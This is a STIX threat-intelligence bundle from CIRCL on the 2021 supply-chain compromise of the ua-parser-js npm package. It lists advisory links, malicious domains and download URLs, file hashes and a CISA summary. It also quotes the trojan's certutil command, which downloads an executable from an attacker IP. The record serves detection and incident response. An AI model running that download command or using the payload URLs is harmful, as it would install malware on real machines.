{ "type": "bundle", "id": "bundle--ad7665ec-fef2-44eb-a019-b1b25a8aec05", "objects": [ { "type": "identity", "spec_version": "2.1", "id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T08:25:55.000Z", "modified": "2021-10-24T08:25:55.000Z", "name": "CIRCL", "identity_class": "organization" }, { "type": "report", "spec_version": "2.1", "id": "report--ad7665ec-fef2-44eb-a019-b1b25a8aec05", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T08:25:55.000Z", "modified": "2021-10-24T08:25:55.000Z", "name": "Malware Discovered in Popular NPM Package, ua-parser-js", "published": "2021-10-24T08:26:47Z", "object_refs": [ "observed-data--e9d82a66-46bd-4f0e-aeac-17349abddeb0", "url--e9d82a66-46bd-4f0e-aeac-17349abddeb0", "observed-data--508a294c-876e-4a8a-a3bd-a3de15e10325", "url--508a294c-876e-4a8a-a3bd-a3de15e10325", "observed-data--f51805cb-5fec-4ce1-b7ae-1d1206720542", "url--f51805cb-5fec-4ce1-b7ae-1d1206720542", "indicator--b6541760-d7e6-432b-9715-eae2ce06ad83", "indicator--3e4cc221-dbb9-4e64-9523-800d8af8f972", "indicator--1b1a28a9-2b47-43a3-92b9-c9353497f429", "indicator--9163b990-5b87-413c-a8e7-f616b908157f", "x-misp-object--30866961-7eda-4bb7-a5e8-cb0bfeebce4c", "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e", "x-misp-object--57d3ed7e-eda9-4e5e-b7ac-a813415e9006", "indicator--116cfff2-f422-4b59-a5aa-630fc443be4b", "indicator--e1f2c049-da88-4238-9dde-4134209c1364", "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd", "indicator--bb6df499-a3fc-4a79-b7f2-5dfc4a277c2b", "x-misp-object--a9b50a3c-793f-4541-a123-60716668e2d5", "relationship--a0fdbcd8-cfac-40ef-a21e-f3c6cda8dd66", "relationship--818e6669-8522-4878-98d9-2e2e94c1ea7d", "relationship--0626f727-f7d0-485d-acc9-2438cae6efbc", "relationship--2cb2f5de-43e7-4e09-a605-90c446dfc9b2", "relationship--6345305f-8dee-46ee-b85a-5fee99199d2f", "relationship--77ff2a21-c177-41e9-8d99-822cdcdbb926", "relationship--e13a000e-2466-4106-b377-41ebfa880f72", "relationship--535d4630-1b4f-4390-9281-30123d986ad4", "relationship--7c956e05-e399-48a0-92ae-5caa11703924", "relationship--a188df7b-b970-4f4f-8836-8d58c4e6c50a", "relationship--8f3fd681-f8c6-4bc9-a5cd-e7de15ac5b53", "relationship--625b2ba7-426b-4c7d-be69-8232c14da018" ], "labels": [ "Threat-Report", "misp:tool=\"MISP-STIX-Converter\"", "type:OSINT", "osint:lifetime=\"perpetual\"", "osint:certainty=\"50\"", "misp-galaxy:mitre-attack-pattern=\"Compromise Software Supply Chain - T1195.002\"", "misp-galaxy:mitre-attack-pattern=\"Compromise Software Dependencies and Development Tools - T1195.001\"" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--e9d82a66-46bd-4f0e-aeac-17349abddeb0", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T07:52:52.000Z", "modified": "2021-10-24T07:52:52.000Z", "first_observed": "2021-10-24T07:52:52Z", "last_observed": "2021-10-24T07:52:52Z", "number_observed": 1, "object_refs": [ "url--e9d82a66-46bd-4f0e-aeac-17349abddeb0" ], "labels": [ "misp:type=\"link\"", "misp:category=\"External analysis\"" ] }, { "type": "url", "spec_version": "2.1", "id": "url--e9d82a66-46bd-4f0e-aeac-17349abddeb0", "value": "https://github.com/advisories/GHSA-pjwm-rvh2-c87w" }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--508a294c-876e-4a8a-a3bd-a3de15e10325", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T07:54:51.000Z", "modified": "2021-10-24T07:54:51.000Z", "first_observed": "2021-10-24T07:54:51Z", "last_observed": "2021-10-24T07:54:51Z", "number_observed": 1, "object_refs": [ "url--508a294c-876e-4a8a-a3bd-a3de15e10325" ], "labels": [ "misp:type=\"link\"", "misp:category=\"External analysis\"" ] }, { "type": "url", "spec_version": "2.1", "id": "url--508a294c-876e-4a8a-a3bd-a3de15e10325", "value": "https://github.com/faisalman/ua-parser-js/issues/536" }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--f51805cb-5fec-4ce1-b7ae-1d1206720542", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T07:58:30.000Z", "modified": "2021-10-24T07:58:30.000Z", "first_observed": "2021-10-24T07:58:30Z", "last_observed": "2021-10-24T07:58:30Z", "number_observed": 1, "object_refs": [ "url--f51805cb-5fec-4ce1-b7ae-1d1206720542" ], "labels": [ "misp:type=\"url\"", "misp:category=\"Payload delivery\"" ] }, { "type": "url", "spec_version": "2.1", "id": "url--f51805cb-5fec-4ce1-b7ae-1d1206720542", "value": "http://159.148.186.228/download/jsextension.exe" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--b6541760-d7e6-432b-9715-eae2ce06ad83", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T07:59:03.000Z", "modified": "2021-10-24T07:59:03.000Z", "pattern": "[url:value = 'https://citationsherbe.at/sdd.dll']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-10-24T07:59:03Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--3e4cc221-dbb9-4e64-9523-800d8af8f972", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T07:59:45.000Z", "modified": "2021-10-24T07:59:45.000Z", "pattern": "[domain-name:value = 'citationsherbe.at']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-10-24T07:59:45Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--1b1a28a9-2b47-43a3-92b9-c9353497f429", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T08:00:44.000Z", "modified": "2021-10-24T08:00:44.000Z", "description": "sdd.dll", "pattern": "[file:hashes.SHA256 = '2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-10-24T08:00:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Artifacts dropped" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Artifacts dropped\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--9163b990-5b87-413c-a8e7-f616b908157f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T08:01:14.000Z", "modified": "2021-10-24T08:01:14.000Z", "description": "jsextension.exe", "pattern": "[file:hashes.SHA256 = '47dded0efc230c3536f4db1e2e476afd3eda8d8ea0537db69d432322cdbac9ca']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-10-24T08:01:14Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Artifacts dropped" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Artifacts dropped\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--30866961-7eda-4bb7-a5e8-cb0bfeebce4c", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T08:25:55.000Z", "modified": "2021-10-24T08:25:55.000Z", "labels": [ "misp:name=\"report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "link", "object_relation": "link", "value": "https://us-cert.cisa.gov/ncas/current-activity/2021/10/22/malware-discovered-popular-npm-package-ua-parser-js", "category": "External analysis", "uuid": "10d9ac50-3208-4cff-9d07-c2bec1c192c8" }, { "type": "text", "object_relation": "summary", "value": "Versions of a popular NPM package named ua-parser-js was found to contain malicious code. ua-parser-js is used in apps and websites to discover the type of device or browser a person is using from User-Agent data. A computer or device with the affected software installed or running could allow a remote attacker to obtain sensitive information or take control of the system. \r\n\r\nCISA urges users and administers using compromised ua-parser-js versions 0.7.29, 0.8.0, and 1.0.0 to update to the respective patched versions: 0.7.30, 0.8.1, 1.0.1 \r\n\r\nFor more information, see Embedded malware in ua-parser-js.", "category": "Other", "uuid": "5faebe54-7492-4f23-99f8-edf5e24e5424" }, { "type": "text", "object_relation": "type", "value": "Alert", "category": "Other", "uuid": "0e1e4035-31a1-4df6-8aa9-2a6208f7f601" } ], "x_misp_meta_category": "misc", "x_misp_name": "report" }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T08:23:57.000Z", "modified": "2021-10-24T08:23:57.000Z", "labels": [ "misp:name=\"command-line\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "text", "object_relation": "value", "value": "certutil -rulcache -f http://159.148.186.228/download/jsextension.exe jsextension.exe", "category": "Other", "uuid": "974258e7-2e79-413c-9be8-08698653b87b" }, { "type": "text", "object_relation": "description", "value": "The trojan try to execute in the cmd", "category": "Other", "uuid": "e3df3b20-a215-40d4-ae1a-a9ed768de240" } ], "x_misp_meta_category": "misc", "x_misp_name": "command-line" }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--57d3ed7e-eda9-4e5e-b7ac-a813415e9006", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T08:11:49.000Z", "modified": "2021-10-24T08:11:49.000Z", "labels": [ "misp:name=\"command-line\"", "misp:meta-category=\"misc\"", "cycat:scope=\"detection\"" ], "x_misp_attributes": [ { "type": "text", "object_relation": "value", "value": "npm show ua-parser-js time", "category": "Other", "uuid": "4834122d-b43b-4b8d-a9d1-3085611ebaec" }, { "type": "text", "object_relation": "description", "value": "To check the time when the package was installed", "category": "Other", "uuid": "542061ee-8993-44ef-8261-f27f25dc9067" } ], "x_misp_meta_category": "misc", "x_misp_name": "command-line" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--116cfff2-f422-4b59-a5aa-630fc443be4b", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T08:21:22.000Z", "modified": "2021-10-24T08:21:22.000Z", "pattern": "[domain-name:value = 'citationsherbe.at' AND domain-name:resolves_to_refs[*].value = '95.213.165.20']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-10-24T08:21:22Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "network" } ], "labels": [ "misp:name=\"domain-ip\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--e1f2c049-da88-4238-9dde-4134209c1364", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T08:03:02.000Z", "modified": "2021-10-24T08:03:02.000Z", "pattern": "[domain-name:resolves_to_refs[*].value = '159.148.186.228']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-10-24T08:03:02Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "network" } ], "labels": [ "misp:name=\"domain-ip\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T08:21:44.000Z", "modified": "2021-10-24T08:21:44.000Z", "description": "Vulnerable npm package UAParser.js - '0.7.29': '2021-10-22T12:15:21.378Z',\r\n'0.7.30': '2021-10-22T16:16:08.807Z',\r\n\r\n'0.8.0': '2021-10-22T12:16:06.877Z',\r\n'0.8.1': '2021-10-22T16:23:53.062Z',\r\n\r\n'1.0.0': '2021-10-22T12:16:19.726Z',\r\n'1.0.1': '2021-10-22T16:26:19.004Z',\r\n", "pattern": "[file:x_misp_pattern_in_file = 'ua-parser-js']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-10-24T08:21:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--bb6df499-a3fc-4a79-b7f2-5dfc4a277c2b", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T08:17:31.000Z", "modified": "2021-10-24T08:17:31.000Z", "pattern": "[file:hashes.MD5 = 'de8b54a938ac18f15cad804d79a0e19d' AND file:hashes.SHA1 = 'b6004c62e2d9dbad9cfd5f7e18647ac983788766' AND file:hashes.SHA256 = '2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-10-24T08:17:31Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--a9b50a3c-793f-4541-a123-60716668e2d5", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T08:22:57.000Z", "modified": "2021-10-24T08:22:57.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2021-10-24T04:03:55+00:00", "category": "Other", "comment": "sdd.dll", "uuid": "a38e6a9c-1573-4b68-b9ee-dfdda8eb57ed" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/gui/file/2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd/detection/f-2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd-1635048235", "category": "External analysis", "comment": "sdd.dll", "uuid": "37fe948f-89f7-4316-bdf3-c88fdbd16b11" }, { "type": "text", "object_relation": "detection-ratio", "value": "23/50", "category": "Artifacts dropped", "comment": "sdd.dll", "uuid": "b36b2447-2d9b-4993-b23b-2ff46ad63d7c" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--a0fdbcd8-cfac-40ef-a21e-f3c6cda8dd66", "created": "2021-10-24T08:25:55.000Z", "modified": "2021-10-24T08:25:55.000Z", "relationship_type": "alerts", "source_ref": "x-misp-object--30866961-7eda-4bb7-a5e8-cb0bfeebce4c", "target_ref": "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--818e6669-8522-4878-98d9-2e2e94c1ea7d", "created": "2021-10-24T08:09:17.000Z", "modified": "2021-10-24T08:09:17.000Z", "relationship_type": "is-in-relation-with", "source_ref": "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e", "target_ref": "indicator--e1f2c049-da88-4238-9dde-4134209c1364" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--0626f727-f7d0-485d-acc9-2438cae6efbc", "created": "2021-10-24T08:10:03.000Z", "modified": "2021-10-24T08:10:03.000Z", "relationship_type": "downloads", "source_ref": "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e", "target_ref": "observed-data--f51805cb-5fec-4ce1-b7ae-1d1206720542" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--2cb2f5de-43e7-4e09-a605-90c446dfc9b2", "created": "2021-10-24T08:23:57.000Z", "modified": "2021-10-24T08:23:57.000Z", "relationship_type": "related-to", "source_ref": "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e", "target_ref": "indicator--9163b990-5b87-413c-a8e7-f616b908157f" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--6345305f-8dee-46ee-b85a-5fee99199d2f", "created": "2021-10-24T08:11:49.000Z", "modified": "2021-10-24T08:11:49.000Z", "relationship_type": "identifies", "source_ref": "x-misp-object--57d3ed7e-eda9-4e5e-b7ac-a813415e9006", "target_ref": "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--77ff2a21-c177-41e9-8d99-822cdcdbb926", "created": "2021-10-24T08:15:51.000Z", "modified": "2021-10-24T08:15:51.000Z", "relationship_type": "is-in-relation-with", "source_ref": "indicator--116cfff2-f422-4b59-a5aa-630fc443be4b", "target_ref": "indicator--3e4cc221-dbb9-4e64-9523-800d8af8f972" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--e13a000e-2466-4106-b377-41ebfa880f72", "created": "2021-10-24T08:21:22.000Z", "modified": "2021-10-24T08:21:22.000Z", "relationship_type": "related-to", "source_ref": "indicator--116cfff2-f422-4b59-a5aa-630fc443be4b", "target_ref": "indicator--b6541760-d7e6-432b-9715-eae2ce06ad83" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--535d4630-1b4f-4390-9281-30123d986ad4", "created": "2021-10-24T08:06:58.000Z", "modified": "2021-10-24T08:06:58.000Z", "relationship_type": "executes", "source_ref": "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd", "target_ref": "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--7c956e05-e399-48a0-92ae-5caa11703924", "created": "2021-10-24T08:16:24.000Z", "modified": "2021-10-24T08:16:24.000Z", "relationship_type": "downloads", "source_ref": "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd", "target_ref": "indicator--b6541760-d7e6-432b-9715-eae2ce06ad83" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--a188df7b-b970-4f4f-8836-8d58c4e6c50a", "created": "2021-10-24T08:21:44.000Z", "modified": "2021-10-24T08:21:44.000Z", "relationship_type": "describes", "source_ref": "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd", "target_ref": "observed-data--508a294c-876e-4a8a-a3bd-a3de15e10325" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--8f3fd681-f8c6-4bc9-a5cd-e7de15ac5b53", "created": "2021-10-24T08:17:32.000Z", "modified": "2021-10-24T08:17:32.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--bb6df499-a3fc-4a79-b7f2-5dfc4a277c2b", "target_ref": "x-misp-object--a9b50a3c-793f-4541-a123-60716668e2d5" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--625b2ba7-426b-4c7d-be69-8232c14da018", "created": "2021-10-24T08:22:57.000Z", "modified": "2021-10-24T08:22:57.000Z", "relationship_type": "related-to", "source_ref": "x-misp-object--a9b50a3c-793f-4541-a123-60716668e2d5", "target_ref": "indicator--b6541760-d7e6-432b-9715-eae2ce06ad83" }, { "type": "marking-definition", "spec_version": "2.1", "id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9", "created": "2017-01-20T00:00:00.000Z", "definition_type": "tlp", "name": "TLP:WHITE", "definition": { "tlp": "white" } } ] }